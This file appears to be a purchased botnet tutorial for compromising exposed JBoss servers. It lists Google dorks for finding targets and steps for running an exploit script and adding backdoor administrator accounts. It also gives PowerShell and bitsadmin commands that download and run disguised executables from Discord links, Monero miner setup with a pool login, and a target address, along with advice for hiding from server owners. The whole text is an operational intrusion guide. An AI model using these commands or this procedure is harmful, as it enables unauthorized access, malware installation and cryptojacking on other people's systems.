Path: blob/master/Botnets/Exploits/JBOSS FULL/Tutorial.txt
5038 views
Sanku For Purchasing121. search using the included dorks for machines that are listed by ip and a port the ports being but not limited to 8080 8000 8081 and 555532.if on linux use the python command to run this program if on windows just use the cd command to get into teh directory that the script is in and run it as if it where an exe43.once you run the script you will be presented with the syntax and it states to run the commadn new.py IP as its format54.run the net user commands that are also provided wiith this scraip to add your own user or to remote execute another program65.use windows RDP to login to the host with the password and username set by the net user commands76.start mining selling or cracking on the server as you wish87.keep in mind that teh legitimate owner of the server can see your account so set the name to somthing like guest91011Dorks12inurl:"jmx-console/HtmlAdaptor"13inurl:"/web-console/Invoker"14inurl:"/invoker/JMXInvokerServlet"15inurl:"8080/jmx-console/"16inurl:"console/Invoker"17intitle:"JMX Console"18intitle:"MBean Inspector"19intitle:JMX inurl:"/HtmlAdaptor?"20intitle:"JMX MBean View"21intitle:"JBoss JMX Management Console"22intitle:JBoss Console23intitle:Jmx Console Htmladaptor24inurl:"/jmx-console/" intitle:"JBoss JMX Management Console"25intitle:�JBoss Management Console � Server Information� �application server� inurl:�web-console�26intitle:"JBoss Management Console -- Server Information" "application server"27inurl:"/web-console/" intitle:"Administration Console"28inurl:�8080/jmx-console�29inurl:�8081/jmx-console�30inurl:�jmx-console�31intitle:"JBoss Management Console"32inurl:"/invoker/JMXInvokerServlet"33inurl:"/web-console/Invoker34inurl:"/web-console/ServerInfo"35site:br inurl:"/jmx-console/HtmlAdaptor"36site:uk inurl:"/jmx-console/HtmlAdaptor"37site:in inurl:"/jmx-console/HtmlAdaptor"38site:ru inurl:"/jmx-console/HtmlAdaptor"39site:pe inurl:"/jmx-console/HtmlAdaptor"40site:br inurl:"/web-console/Invoker"41site:uk inurl:"/web-console/Invoker"42site:ru inurl:"/web-console/Invoker"43site:us inurl:"/web-console/Invoker"44site:com inurl:"/web-console/Invoker"45inurl:"jboss.system:type=ServerInfo"46inurl:"jbossass.war"4748PowerShell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/364455677499932686/424307504512630785/svchost.exe');Start-Process 'svchost.exe'4950cat /proc/cpuinfo5152https://lolekhosted.net/5354lscpu5556# apt-get update57# apt-get install libcurl4-openssl-dev git58# apt-get install build-essential autotools-dev autoconf libcurl3 libcurl4-gnutls-dev59# mkdir /download60# cd /downloads61# git clone https://github.com/wolf9466/cpuminer-...62# cd cpuminer-multi63# ./autogen.sh64# CFLAGS="-march=native" ./configure65# make66# make install67# minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x6869Add user commands70net users SystemZ Backdoor1234 /add71net user LulZ SystemZ321 /ADD72net localgroup administrators SystemZ /add737475bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/426301760345210880/Windows_Explorer.exe %SystemRoot%\Windows_Explorer.exe76cd %SystemRoot%77Windows_Explorer.exe7879bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/392494650717634561/update.exe %SystemRoot%\update.exe80818283bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/424307504512630785/svchost.exe %SystemRoot%\svchost.exe84cd %SystemRoot%85svchost.exe86878889bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/389053867717033994/imminent.exe %SystemRoot%\imminent.exe9091Note the given commands result in a username of SystemZ with the password Backdoor12349293112.199.118.125:80809495